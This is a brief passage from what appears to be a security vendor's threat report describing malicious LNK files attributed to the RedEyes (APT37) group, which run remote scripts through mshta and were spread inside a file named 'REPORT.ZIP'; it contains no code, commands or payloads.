This malware executes additional scripts located at a specific URL through the mshta process. This command performs functions similar to those previously disclosed in Table 1 of the post <RedEyes Group Wiretapping Individuals (APT37)> [3]. The threat actor has been distributing the confirmed LNK file on a regular website by uploading it alongside malware within a compressed file. The malicious LNK file has been uploaded under the file name ‘REPORT.ZIP.’ Similar to the malware identified in <RokRAT Malware Distributed Through LNK Files (*.lnk): RedEyes (ScarCruft)> [2], this file has an LNK that contains normal Excel document data and malicious script code.